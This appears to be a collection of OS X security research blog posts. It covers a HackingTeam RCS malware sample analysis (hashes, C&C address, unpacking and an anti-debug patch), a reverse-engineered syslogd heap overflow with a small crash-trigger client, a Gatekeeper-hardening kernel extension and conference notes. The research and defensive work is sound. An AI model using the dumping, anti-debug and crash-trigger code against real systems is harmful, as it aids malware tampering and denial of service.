SyScan360 Singapore 2016 slides and exploit code

The exploit for the bug I presented last March at SyScan360 turns one year old today, so I decided to release it. I wasn't sure if I should, since it can be used in the wild, but Google Project Zero also released a working version, so it doesn't really make a difference.

I’m also publishing here the final version of the slides that differ slightly from the version made available at the corporate blog.

You can find the slides here and the PoC code on GitHub.

The exploit code is slightly different from Ian Beer's exploit, so you might want to give it a look. It's a pretty clean and neat exploit :-).

You can find Ian Beer's blog post about this bug here. Bug collisions are not fun; I expected this bug to stay alive for a lot longer, but Ian Beer is awesome, so hat tip to him.

The bug itself is super fun since it allows you to exploit any SUID binary or entitlements, meaning you can escalate privileges to root and then bypass SIP and load unsigned kernel extensions with the same bug. Essentially, massive pwnage with a single bug. The only thing missing is remote code execution. Ohhhhh :-(.

Every OS X version except El Capitan 10.11.4 is vulnerable, so if you are running an older system you should consider upgrading asap (they are also vulnerable to other unpatched bugs anyway!).

Have fun,
fG!

The Italian morons are back! What are they up to this time?

Nothing 🙂

HackingTeam was deeply hacked in July 2015 and most of their data was spilled into public hands, including source code for all their software and also some 0day exploits. This was an epic hack that showed us their crappy internal security but, more important than that, their way of doing things and their internal and external discussions, since using PGP was too much of an annoyance for these guys (Human biases are a royal pain in the ass, I know!). You can consult the email archives in this online and searchable WikiLeaks archive. I got some love in those emails, although they never sent that promised Playboy subscription (not interested anymore guys, they gave up on nudes!). For an epic presentation about their OS X RCS malware have a look at these slides.

Last Friday a new OS X RCS sample was sent to me (big thanks to @claud_xiao from Palo Alto Networks for the original discovery, and as usual to @noarfromspace for forwarding it to me). My expectations weren't high since all the public samples were rather old and now we have their source code, so an old sample would be totally uninteresting to analyse. But contrary to my expectations there are some interesting details in this sample. So let's start once more our reverse engineering journey…

The sample hashes are:

ZIP with dropper: 2ee9e9d9a0cd3cee6519e7b950821d5c90af03da665879615e52fd093dd8e947
Dropper binary: 58e4e4853c6cfbb43afd49e5238046596ee5b78eca439c7d76bd95a34115a273

Both files were submitted to VirusTotal three weeks ago.
[image: zip_vt_submission] [image: dropper_vt_submission]
And their detection rate was (as mostly expected) zero.
[image: vtInstaller]
As I have written a couple of times, the first thing we should do is look at the mach-o headers of the binary files. This can quickly give us valuable information and save us some time later.
[image: main_header]
The first thing one notices in this binary is the extra segment called "_eh_frame". This is not a normal segment, although it is named after a section that can usually be found in mach-o binaries. HackingTeam used this same trick in the past, so it's a strong indicator that we are analysing HackingTeam malware and that this could still be an old sample.
[image: text_segment]
The next trick is that this binary uses Apple's binary protection, which we can spot via the SG_PROTECTED_VERSION_1 flag set in the segment flags. A good reference on this Apple feature is Amit Singh's blog post. It's pretty easy to dump and recover the original code, so this is not an obstacle to reverse engineering the sample; it mostly serves to evade AV detection. Back in 2009 I wrote a blog post on how to manually dump these binaries, or you can use "deprotect" from Classdump to do it for you automatically.
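
If you want to spot that flag without a GUI tool, a quick header walk is enough. Below is a minimal sketch, assuming a thin 64-bit mach-o (fat and 32-bit binaries need extra handling), that walks the load commands and marks the protected segments:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <mach-o/loader.h>

/* Minimal sketch: walk the load commands of a thin 64-bit mach-o and
 * print each segment, marking the ones protected with SG_PROTECTED_VERSION_1. */
int main(int argc, char *argv[])
{
    if (argc != 2) { fprintf(stderr, "usage: %s binary\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "rb");
    if (f == NULL) { perror("fopen"); return 1; }
    struct mach_header_64 mh;
    if (fread(&mh, sizeof(mh), 1, f) != 1 || mh.magic != MH_MAGIC_64) {
        fprintf(stderr, "not a thin 64-bit mach-o\n");
        return 1;
    }
    uint8_t *cmds = malloc(mh.sizeofcmds);
    if (cmds == NULL || fread(cmds, mh.sizeofcmds, 1, f) != 1) return 1;
    uint8_t *ptr = cmds;
    for (uint32_t i = 0; i < mh.ncmds; i++) {
        struct load_command *lc = (struct load_command *)ptr;
        if (lc->cmd == LC_SEGMENT_64) {
            struct segment_command_64 *seg = (struct segment_command_64 *)ptr;
            printf("%-16.16s flags: 0x%x%s\n", seg->segname, seg->flags,
                   (seg->flags & SG_PROTECTED_VERSION_1) ? "  <- protected" : "");
        }
        ptr += lc->cmdsize;
    }
    free(cmds);
    fclose(f);
    return 0;
}
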
[image: eh_frame_segment]
The injected segment is also protected with the same Apple feature, and the deprotect tool seems unable to deal with it. We can try to manually dump this segment. For that we need to attach a debugger to the dropper binary, since the segment will only be decrypted when its memory pages are used. This is where we find one interesting trick in this sample :-).

Before we go there, a last screenshot from the binary headers. If we look at the entrypoint it points into the “_eh_frame” segment, which is also very unusual (VirusTotal flags this as suspicious). What happens is that the normal __TEXT segment is fake since it contains no code (look at the size, it occupies 4kb in memory). Same trick as older RCS samples.
entrypointI’m not a fan of lldb so I still use old Apple’s gdb. It works for me so why bother with the newer but awkard lldb?
The entrypoint is a good place for a breakpoint, so that's where we start. When we run the dropper, gdb gives us a weird error message.
[image: gdb_output]
Gdb has hit an EXC_BAD_ACCESS exception at the entrypoint address, meaning that the memory permissions are wrong. The segment is now decrypted (you can compare this code with the code you get if you try to disassemble the binary on disk) and we can dump it with gdb itself or with my readmem util. What we are unable to do is step through and debug the dropper binary. To dump with readmem just use "readmem -p PID -a 0x7000 -s 0xB9000"; with gdb use "dump memory FILENAME 0x7000 0xC0000". This will give you the full "_eh_frame" segment, which you can then load into a disassembler. It's not a mach-o binary, so the disassembler will complain, but you know where the entrypoint is, so you can disassemble from there.
Anyway, let's get into the interesting stuff. The gdb error quickly gave me a hint to look again at the mach-o headers. Let's look at the "_eh_frame" segment header again…
[image: eh_frame_segment]
Can you spot anything special here?
Look at the VM memory protections. The maximum VM protection is set to Read and Write, and the initial VM protection to Read and Execute. For this code to run, the memory needs to be executable. What happens here is that the maximum VM protection does not allow execution, and that is the reason why gdb is unable to access the memory. The fix is as simple as setting the maximum protection to RWX (modify the hex value to 0x7). That's quite a nice anti-debugging trick I don't remember ever seeing before. Hat tip to you, HackingTeam ;-).
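
The same header walk can be used to patch the protection. Here is a minimal sketch, again assuming a thin 64-bit mach-o (a 32-bit binary would use mach_header/segment_command instead), that sets the maximum protection of a named segment to VM_PROT_ALL directly in the file:

#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <mach-o/loader.h>
#include <mach/vm_prot.h>

/* Minimal sketch: set the maximum VM protection of a named segment to
 * RWX (VM_PROT_ALL = 0x7) directly in the file. Thin 64-bit mach-o only. */
int main(int argc, char *argv[])
{
    if (argc != 3) { fprintf(stderr, "usage: %s binary segname\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "r+b");
    if (f == NULL) { perror("fopen"); return 1; }
    struct mach_header_64 mh;
    if (fread(&mh, sizeof(mh), 1, f) != 1 || mh.magic != MH_MAGIC_64) {
        fprintf(stderr, "not a thin 64-bit mach-o\n");
        return 1;
    }
    long offset = sizeof(mh);
    for (uint32_t i = 0; i < mh.ncmds; i++) {
        struct load_command lc;
        fseek(f, offset, SEEK_SET);
        if (fread(&lc, sizeof(lc), 1, f) != 1) break;
        if (lc.cmd == LC_SEGMENT_64) {
            struct segment_command_64 seg;
            fseek(f, offset, SEEK_SET);
            if (fread(&seg, sizeof(seg), 1, f) != 1) break;
            if (strncmp(seg.segname, argv[2], sizeof(seg.segname)) == 0) {
                seg.maxprot = VM_PROT_ALL; /* 0x7 = R+W+X so the debugger can work with it */
                fseek(f, offset, SEEK_SET);
                fwrite(&seg, sizeof(seg), 1, f);
                printf("patched maxprot of %s to 0x%x\n", argv[2], seg.maxprot);
            }
        }
        offset += lc.cmdsize;
    }
    fclose(f);
    return 0;
}
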

Looking at the dropper code and comparing it with older samples, we can't spot many differences. The structure is more or less the same and the tricks are still the same, so you can refer to my slides and older blog posts if you are interested in those details. The only difference is that this time the dropper only packs a single persistency binary and a configuration file; older samples packed more stuff. In case you dumped the "_eh_frame" segment as I described, you can find the packed files at address/offset 0x22A4. At offset 0x22B7 we have the name of the persistency binary, "_9g4cBUb.psr", and at 0x22D7 the folder name "8pHbqThW". The folder where the dropper installs binaries is still the same as in older samples, "~/Library/Preferences/".
At offset 0x22F7 we have the size of the binary, 0xB5DF9, and at 0x22FB starts the persistency binary that will be installed by the dropper. At 0xB80F8 we can find the configuration file name, "Bs-V7qIU.cYL". It has a size of 0x8F0 bytes (the size field is at offset 0xB8138) and its contents start at offset 0xB813C. As usual, the configuration file is encrypted.
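
To carve both files out of the dumped segment, a few fseek()/fread() calls are enough. A minimal sketch using the offsets and sizes above (valid for this particular dump only):

#include <stdio.h>
#include <stdlib.h>

/* Minimal sketch: carve the packed persistency binary and the encrypted
 * configuration file out of the dumped "_eh_frame" segment, using the
 * offsets and sizes above (specific to this sample/dump). */
static int carve(FILE *in, long offset, size_t size, const char *out_name)
{
    unsigned char *buf = malloc(size);
    if (buf == NULL) return -1;
    fseek(in, offset, SEEK_SET);
    if (fread(buf, 1, size, in) != size) { free(buf); return -1; }
    FILE *out = fopen(out_name, "wb");
    if (out == NULL) { free(buf); return -1; }
    fwrite(buf, 1, size, out);
    fclose(out);
    free(buf);
    return 0;
}

int main(int argc, char *argv[])
{
    if (argc != 2) { fprintf(stderr, "usage: %s eh_frame_dump\n", argv[0]); return 1; }
    FILE *in = fopen(argv[1], "rb");
    if (in == NULL) { perror("fopen"); return 1; }
    carve(in, 0x22FB, 0xB5DF9, "_9g4cBUb.psr");  /* persistency binary */
    carve(in, 0xB813C, 0x8F0, "Bs-V7qIU.cYL");   /* encrypted config   */
    fclose(in);
    return 0;
}
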

Let's recap what we have seen so far. The dropper uses more or less the same techniques as older HackingTeam RCS samples and its code is more or less the same. The new things we can observe are the use of Apple's binary protection feature and a small anti-debugging trick. So far, nothing spectacular. Either this is an old sample or HackingTeam is still using the same code base as before the hack.

The next logical step is to look at the persistency binary we extracted from the "_eh_frame" segment. This is where the core of RCS is and it should help us answer interesting questions, in particular how old this sample is. For me this was what really mattered about this sample. Once again, let's look at its headers.
[image: dropped_binary_header]
By now you are already a mach-o expert and noticed how simple this header is. It only contains two segments and one section. This is not normal, in particular when we expect HackingTeam's persistency binary to be Objective-C code as in the past.
Loading this into a disassembler, we get only a tiny amount of code; the rest appears to be junk. This is pretty much a telltale sign that this binary is packed. It points straight away to HackingTeam's own packer, keypress, which can be found in the leaked source code. The easiest way to validate this assumption is to compare the disassembly with the source code. The following piece of disassembly clearly identifies this as keypress.
[image: keypress_packer]
For legal reasons I'm not going to display the leaked source code, but you can easily compare those strings and find them in the unpacker code. This is the first sample I have ever seen using their packer, which makes sense since the packer has a 2014 date and all known samples were older than that.
The packer has nothing special and you can even dump it using my readmem util (this time use the -m option to have it dump the full binary from memory). Just start the persistency binary in a VM and, while it's starting, quickly launch readmem and dump it. The alternative is to load it in gdb, find the original entrypoint, and dump from there. It's a bit more work because gdb can't activate breakpoints on this binary, so you will need to manually patch in int3 all over to get gdb to break. If you are using gdbinit you can use the int3/rint3 commands to automate this work.

With the persistency binary finally dumped we can answer relevant questions. What is the date of this sample?
The date question can be answered in two ways: using the information from the configuration file (at this stage still encrypted) and from the encoded version information.
The source code has a variable called gVersion that refers, more or less, to the sample date. From the source code leak we can find the latest value for this variable, 2015032101, in a commit from 9 April 2015. The gVersion value is a good approximation of the commit date and allows us to place the sample in time.

A bit of reverse engineering here and there and we can find the value of this variable for this sample, 0x781C294E, translating to 2015111502. BINGO! This places the sample around October/November 2015, a super fresh RCS sample, post July hack. Never before have we had such a fresh sample. And if this date is true, we have a post-hack sample, meaning that HackingTeam is still alive and kicking after the July hack.
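
The translation is simply the hex value read as decimal, which appears to follow the same YYYYMMDDNN layout as the 2015032101 value from the repository:

#include <stdio.h>

int main(void)
{
    /* gVersion from this sample: 0x781C294E == 2015111502 decimal,
     * same YYYYMMDDNN layout as the 2015032101 value from the repo. */
    printf("%u\n", 0x781C294EU);
    return 0;
}
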

The next step is to confirm this information using the configuration file. First we locate the configuration file encryption key and then decrypt it. There we can find the configuration dates for this sample, 2015-10-16, confirming that this is indeed a post-hack sample. The C&C server IP for this sample is 212.71.254.212. It's already down, and I didn't verify if it was up before I started tweeting about this sample last Friday (honestly I don't care much about the server side). It might have been up and was quickly brought down, or it was already down (or this is simply a demo, but it doesn't look like it).

The last question is to understand what happened to HackingTeam after the July hack. At the time they promised to release a new version that, they claimed, was not affected by the hack. Is this really true?
Well, if you start disassembling and comparing with the leaked source code you will see that this appears to be totally false. The sample is compiled from the leaked source code base and I can't see many new improvements. I can guarantee you that this sample's code comes from that code base, up to the last commit (there are probably newer commits after the leak). HackingTeam appears to have resumed their operations, but they are still using their old source code for this. Of course, there is the question of whether they are using both the old and the new promised source code, or whether they were just lying about it and resumed operations with the old code since they are probably short on engineering "talent". This is definitely a question their customers will have to ask them ;-).

Conclusions…

HackingTeam's latest sample is very fresh compared with what we got in the past, it was created after the July 2015 hack, and it uses the same code base as before. HackingTeam is still alive and kicking, but they are still the same crap morons the email leaks showed us.
If you are new to OS X malware reverse engineering it’s a nice sample to practice with. I got my main questions answered so for me there’s nothing else interesting about this. After the leak I totally forgot about these guys :-).

@noarfromspace made a good point that this sample could have been compiled by someone other than HackingTeam, since the source code is out. It is definitely an easier and less sexy alternative explanation. My feeling is that, while possible, this is not the case. But never forget that human biases can always lead us down the wrong path ;-).
For example, the gVersion variable appears to be updated manually in the source code repo (I can't find any automated scripts for this) and follows the same pattern as previous versions. A definitive answer needs a bit more reverse engineering time.

Some interesting network info provided by Charlie Eriksen tells us that the host was up at least in January and Shodan has a scan on the same day the sample was submitted to VirusTotal. References here and here.
Update: John Matherly just left some historical Shodan data. Shodan detected this host as up as far back as 15 October 2015. The activation date of the filters in the configuration file starts on the next day. Pretty good data out of Shodan 🙂

Looking at VirusTotal submission details we have the following:

  • The zip file was created on 2016-01-29 11:43:50 UTC and submitted to VirusTotal via the web interface on 2016-02-04 from Italy. Censys updated the C&C server info at 2016-01-18T19:21:09+00:00.
  • The dropper binary was submitted to VirusTotal twice on 2016-02-04 from France via the API.
  • The bundle binary that is also extracted into the target persistency folder was submitted the next day, 2016-02-25 07:36:07 UTC, via the API from an unknown country and from the installation folder /Users/user1/Library/Preferences/8pHbqThW/w1_X-Hye.gn6.

Update: I just found some unique code in this dropper. This code checks for newer OS X versions and does not exist in the leaked source code. Either someone is maintaining and updating HackingTeam's code (why the hell would someone do that!?!?!) or this is indeed a legit sample compiled by HackingTeam themselves. Reuse and repurposing of malware source code happens (Zeus, for example), but my gut feeling and the indicators don't seem to point in that direction.

Have fun,
fG!

P.S.: This might be a work in progress post and some new content might be added or fixed.

Reversing Apple’s syslogd bug

Two days ago El Capitan 10.11.3 was released, together with security updates for Yosemite and Mavericks. The bulletin available here describes nine security issues, most of them related to the kernel or IOKit drivers. The last security issue is a memory corruption issue in syslog that could lead to arbitrary code execution with root privileges. I was quite curious about this bug, mostly because it involves syslogd, a logging daemon.

This post is about reversing the vulnerability and finding out how it could be exploited. Unfortunately for us, Apple is very terse in its security updates; for example, they say nothing about whether a bug is exploitable on default OS X installations or requires particular conditions. As we will see later on, this bug is not exploitable on default OS X installations.

While Apple makes the source code for many components used in OS X available, most of the time there is a significant delay, so we need to use binary diffing to find the differences between the vulnerable and updated binaries. The usual tool for this purpose is BinDiff, but there is also a free alternative called Diaphora made by Joxean Koret. Both tools require IDA, and in this post we are going to use Diaphora. For this we need a copy of the vulnerable and patched binaries. The easiest way is to copy the syslogd binary (found at /usr/sbin/syslogd) before the updates are installed (it's usually a good idea to have virtual machine snapshots for each version) and then after (or just extract the new binary from the update packages – El Capitan, Yosemite, Mavericks). This post will focus on Yosemite binaries.

Diaphora essentially works by generating a database and then comparing its contents. Comparing the 10.11.2 and 10.11.3 syslogd binaries gets us the following warning from Diaphora:

[image: identical_callgraph]
This means that both binaries are very similar so we should expect minimal changes between the two. Only one change is detected and its output is below.

[image: patch_diff]
The change is quite subtle. The original code could be something like:

reallocf(pointer, value + 4);

And the patch something like:

reallocf(pointer, value * 4 + 4);

The syslogd source package for El Capitan 10.11.2 can be downloaded here. The easiest way to locate this function is to grep the code for the string "add_lockdown_session: realloc failed\n", which gives a single hit inside syslogd.tproj/dbserver.c. The source code for this function is:
[image: add_lockdown_session_code]
This makes it easier to observe the vulnerability. The patch is made on the reallocf() allocation size, while the vulnerability is triggered when the fd variable is written into the lockdown_session_fds array. The allocation size used in reallocf() is wrong since it allocates memory just for the number of lockdown sessions instead of enough memory for each session's entry. The following image, taken from Zimperium's analysis, is a perfect illustration of the overflow and heap corruption.
[image: Heap-overflow-out-of-bounds-write-because-of-invalid-size-calculation-during-reallocation]
At the third connection the heap corruption is already happening, but in my tests more connections are required to make it crash (most of the time I get crashes in different areas than Zimperium did, but I was also testing against OS X).

The developer of this particular piece of code made a mistake, and the fix can be as simple as adding a set of parentheses:

[image: code_fix]
The C language is powerful but unforgiving of these small mistakes.
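
To make the pattern concrete, here is a simplified illustration of the allocation bug (not Apple's exact source, just the shape suggested by the diff above):

/* Simplified illustration of the bug, not Apple's exact source: the
 * reallocf() sizes mirror the "value + 4" vs "value * 4 + 4" diff above. */
#include <stdlib.h>

static int *lockdown_session_fds;
static int  lockdown_session_count;

void add_lockdown_session_vulnerable(int fd)
{
    /* BUG: allocates count + 4 bytes instead of 4 bytes per session,
     * so the write below quickly runs past the end of the buffer. */
    lockdown_session_fds = reallocf(lockdown_session_fds,
                                    lockdown_session_count + sizeof(int));
    if (lockdown_session_fds == NULL) return;
    lockdown_session_fds[lockdown_session_count++] = fd;
}

void add_lockdown_session_fixed(int fd)
{
    /* FIX: one int per session, i.e. sizeof(int) * (count + 1) bytes. */
    lockdown_session_fds = reallocf(lockdown_session_fds,
                                    sizeof(int) * (lockdown_session_count + 1));
    if (lockdown_session_fds == NULL) return;
    lockdown_session_fds[lockdown_session_count++] = fd;
}
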

At this point we know where the vulnerability is and how it was patched. The next question is how do we reach this function? The following is the partial call graph for add_lockdown_session():

[image: callgraph_add_lockdown_session]
Judging by the function names, the vulnerable function can be reached either locally (unix socket?) or remotely/locally (via TCP socket). The security bulletin mentions an attack from a local user. Looking at the /System/Library/LaunchDaemons/com.apple.syslogd.plist configuration we can only observe the syslog unix socket:
[image: default_syslogd_sockets]
This means that the default configuration in OS X is not vulnerable, unless the user changes it. Unfortunately for us Apple doesn't mention this in the bulletin, which is interesting information, for example, for anyone running old systems that can't be upgraded.
Let's dig a bit deeper and understand what we need to do to activate this feature in OS X so we can try to reproduce the vulnerability. The remote_acceptmsg_tcp() function seems like a good candidate to trace back. Looking it up in the source code we find an interesting function:
[image: remote_init_source]
This is the function that activates the remote feature which allows us to reach the vulnerable code. The #ifdefs mean that we can check the binary to see which of them were compiled into the final binary.
[image: remote_init]
The disassembly output of remote_init() shows that only remote_init_tcp() was compiled, meaning that we can reach the vulnerable code via TCP sockets, either locally or remotely depending on the user configuration. The remote_init_tcp() function takes care of creating and binding the listener socket and is the one calling remote_acceptmsg_tcp(), which we saw in the first call graph, via Grand Central Dispatch.
[image: remote_init_tcp_source]
We still don't know how to activate the remote feature. The next step is to see who calls remote_init(). There are two calls, but the most interesting is init_modules().
[image: init_modules_source]
The remote module support is compiled into the syslogd binary if the target is not the iOS simulator, and its default enabled/disabled status depends on the remote_enable local variable. Its default value is zero, meaning the remote feature is disabled by default. This is another strong clue that a default OS X installation is not vulnerable.
Finally, init_modules() is called by main(), where we can find the final clues about how to activate this feature.
[image: main_source]
Inside main we can observe interesting things and finally be sure whether OS X is vulnerable on a default installation or not. The first thing we can observe in the above code snippet is that the remote feature is enabled by default on the embedded OS, usually meaning iOS and AppleTV. Next, there is a "-config" option that also enables it if the iphone option is selected. Last is the undocumented "-remote" command line option, which can enable the remote feature on any Apple operating system.

To activate the feature we need to edit the syslogd launchd configuration file found at /System/Library/LaunchDaemons/com.apple.syslogd.plist (usually in binary format, but it can be converted using "plutil -convert xml1 filename"). The ProgramArguments and Sockets keys need to be modified to the following:

[image: launchd_config]
Because launchd controls the sockets, we also need to configure the socket where syslogd will be listening for the remote option (#define ASL_REMOTE_PORT 203).
After we modify the plist and reload syslogd we can finally connect to port 203.

[image: telnet_asl_remote_example]
The vulnerable code path is triggered using the watch command. If we attach a debugger and insert a breakpoint in the vulnerable add_lockdown_session(), the breakpoint is never hit when we issue the watch command. This is the code inside session() that calls the vulnerable function:
[image: call_vulnerable_function]
The WATCH_LOCKDOWN_START flag is only set in one place inside session():
[image: set_watchdown_flag]
The SESSION_FLAGS_LOCKDOWN is a flag passed in session()'s only argument.
And we can finally observe and conclude why the security bulletin talks about a local user:
[image: remote_acceptmsg_source]
This means that the SESSION_FLAGS_LOCKDOWN flag is only set on local connections and never on remote TCP connections, the only feature we can enable in the OS X syslogd binary. The functions that call remote_acceptmsg() show it clearly.
[image: remote_acceptmsgs_source]
The conclusion is that there is no code path to trigger this bug in OS X, even if the user configures the remote feature. The only way to test the bug and observe it in action is to attach to the syslogd binary (or patch it) and remove the above condition (we could also patch inside session(), but this is easier). Next we just need a small TCP client that opens a few connections to port 203 and issues the watch command, as in the sketch below. Sooner or later the syslogd binary will finally crash.
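
A minimal sketch of such a client, assuming syslogd was reconfigured for port 203 and patched as described above (otherwise the lockdown path is never taken):

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>

/* Minimal sketch: open several connections to syslogd's ASL remote port
 * and issue the "watch" command on each one. Only useful against a
 * syslogd reconfigured/patched as described above. */
int main(void)
{
    const char *cmd = "watch\n";
    for (int i = 0; i < 32; i++) {
        int s = socket(AF_INET, SOCK_STREAM, 0);
        if (s < 0) { perror("socket"); return 1; }
        struct sockaddr_in addr;
        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(203);                 /* ASL_REMOTE_PORT */
        addr.sin_addr.s_addr = inet_addr("127.0.0.1");
        if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
            perror("connect");
            close(s);
            return 1;
        }
        write(s, cmd, strlen(cmd));
        sleep(1);
        /* sockets are left open on purpose; each live session adds an fd
         * to the lockdown_session_fds array */
    }
    pause(); /* keep all connections alive until syslogd crashes */
    return 0;
}
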
The vulnerability also doesn’t seem easy to exploit because we don’t have much control over the fd variable that is overwriting the allocated array.

One final note is that the vulnerability was only patched in El Capitan and not included in the Yosemite and Mavericks security updates. While we have just seen that even on El Capitan there is no code path to the vulnerable code, it is weird that the older versions weren't also patched. Apple's security policy is still confusing most of the time.

So after a long post we can finally conclude that there is nothing really interesting about this vulnerability in OS X (and also iOS given the potential barriers to exploitation). It was just an interesting reverse engineering and source code analysis exercise to understand the vulnerability impact in OS X. This exercise wouldn’t be needed if Apple just published more relevant details on its security bulletin.

Thanks to pmsac for draft post review and exploitation discussion (also to qwertyoruiop and poupas).

Have fun,
fG!

P.S.: The tool used to generate the call graph is Understand from http://www.scitools.com. It’s a great tool for browsing and auditing large projects.

Gatekeerper – A kernel extension to mitigate Gatekeeper bypasses

Last month Patrick Wardle presented “Exposing Gatekeeper” at VB2015 Prague.
The core of the presentation deals with Gatekeeper bypasses originating in the fact that Gatekeeper only verifies the code signatures of the main binary and not of any linked libraries/frameworks/bundles.
This means it is possible to run unsigned code, using the dynamic library hijacking techniques also presented by Patrick, in code that should be protected by Gatekeeper. His exploit uses an Apple code-signed application that is vulnerable to dylib hijacking and is modified to run unsigned code when downloaded from the Internet. In this scenario Gatekeeper enters into action and should verify whether the download is code signed (assuming the default OS X scenario where it is enabled). But in this case Gatekeeper fails to verify the linked code and is effectively bypassed.

The core of the problem is that Gatekeeper only deals with the main binary code and never verifies any linked code. This is obviously a flaw, and hopefully a fix by Apple will be out sooner or later. Meanwhile, we can try to build ourselves a fix using the TrustedBSD framework. For this I created Gatekeerper, a proof-of-concept kernel extension for Yosemite 10.10.5 (it can easily be adapted to work with El Capitan, but I don't want to release that code).
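
For reference, the registration skeleton of a TrustedBSD policy module looks roughly like the sketch below (a hypothetical minimal example built against Kernel.framework's mac_policy.h, not Gatekeerper's actual code); the real work happens in the mac_policy_ops hooks, where the code signatures of linked code would be verified.

#include <mach/mach_types.h>
#include <mach/kmod.h>
#include <security/mac_policy.h>

static mac_policy_handle_t gk_handle;

/* The interesting hooks (e.g. checks on library mapping/loading) would be
 * installed here; this skeleton registers an empty policy. */
static struct mac_policy_ops gk_ops = { 0 };

static struct mac_policy_conf gk_conf = {
    .mpc_name            = "gatekeerper_poc",
    .mpc_fullname        = "Gatekeeper linked code check PoC",
    .mpc_labelnames      = NULL,
    .mpc_labelname_count = 0,
    .mpc_ops             = &gk_ops,
    .mpc_loadtime_flags  = MPC_LOADTIME_FLAG_UNLOADOK,
    .mpc_field_off       = NULL,
    .mpc_runtime_flags   = 0,
};

kern_return_t gatekeerper_start(kmod_info_t *ki, void *d)
{
    /* register the policy with the TrustedBSD MAC framework */
    return mac_policy_register(&gk_conf, &gk_handle, d) ? KERN_FAILURE : KERN_SUCCESS;
}

kern_return_t gatekeerper_stop(kmod_info_t *ki, void *d)
{
    return mac_policy_unregister(gk_handle) ? KERN_FAILURE : KERN_SUCCESS;
}
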

London and Asia EFI monsters tour!

Finally back home from China and Japan tour, so it’s time to finally release the updated slides about EFI Monsters. After Secuinside I updated them a bit, fixing stuff I wasn’t happy with and adding some new content.

The updated version was first presented at 44CON London. I had serious reservations about going to the UK (not even in transit!) but Steve Lord's and Adrian's charm convinced me to give it a try. 44CON was great and it's definitely a must-attend European conference. It has the perfect size to meet people and share ideas. I prefer single-track conferences; dual track is the max I'm interested in. More than that and it's just too big, too messy, too many choices to be made regarding what to see.

A big thanks to everyone at 44CON who made it possible!

Next was SyScan360 in Beijing. It was the fourth time it happened, and my third time in a row. I very much like going there because, even with the language barrier, you can feel what's happening there. I bought a bunch of (cheap) hardware gear made by the 360 Unicorn team. Their "USB condom" is super cheap and super small. I also bought a network tap and a USB-to-serial adapter (didn't really need it but it was damn cheap). The SyScan360 badge was super fun as usual, this time with a micro Arduino, Bluetooth and LED modules. The conference went pretty smoothly and I had lots of fun. They had a gigantic LED panel where the slides were displayed. That was some gigantic TV they had there 🙂

Big thanks to everyone involved in SyScan360 2015.

Last stop was CODE BLUE, happening in my current favorite city outside Portugal, aka Tokyo. It was its third edition, my second in a row. The organization is top notch and everything goes smoothly. Congrats to Kana, El Kentaro, Tessy, and everyone else involved.
This year it had two tracks, and a lot more attendees. It’s definitely a conference to put on your calendar. The audience is super interested in learning. Japan is lagging behind in terms of security so they are keen to finally catch up.

Some people approached me and showed some interest in (U)EFI security. This is great; that was the goal of this presentation, to show people that (U)EFI research isn't that hard and that it is really important that its issues start to be fixed. We need to start building trustworthy foundations and not try to solve everything in software on top of platforms we can't really trust.

Last conference for the year is No cON Name happening in Barcelona next December.

For next year I already got something that hopefully I’ll be able to present at SyScan360 Singapore. Their CFP is open and you should definitely think about submitting.

There were minor changes between the 44CON and SyScan360/CODE BLUE slides. The latter include more references than the 44CON version, plus minor fixes.

Have fun,
fG!

Slides:
44Con 2015 – Efi Monsters.pdf
SyScan360 2015 – Efi Monsters.pdf
CodeBlue 2015 – Efi Monsters.pdf

Rootfool – a small tool to dynamically disable and enable SIP in El Capitan

El Capitan is finally released, and System Integrity Protection, aka SIP, aka rootless, is now a reality we must face. Let me briefly describe SIP (technical details maybe in another post, now that El Capitan is final and out of NDAs). This post by Rich Trouton contains a very good description of its userland implementation and configuration.

What is SIP anyway?

The description that I like to use is that SIP is a giant system-wide sandbox that controls access to what Apple considers critical files and folders. One of the reasons for this is that most of the kernel-side SIP implementation lives in Sandbox.kext, the same TrustedBSD kernel extension that implements the OS X sandbox mechanism.

For example, if we try to write to /System folder we get the following result:

sh-3.2# touch /System/test
touch: /System/test: Operation not permitted

And in system logs:

12/10/15 17:27:20,650 sandboxd[120]: ([424]) touch(424) System Policy: deny file-write-create /System/test

In practice it means that even with root access we are unable to modify those critical files and folders.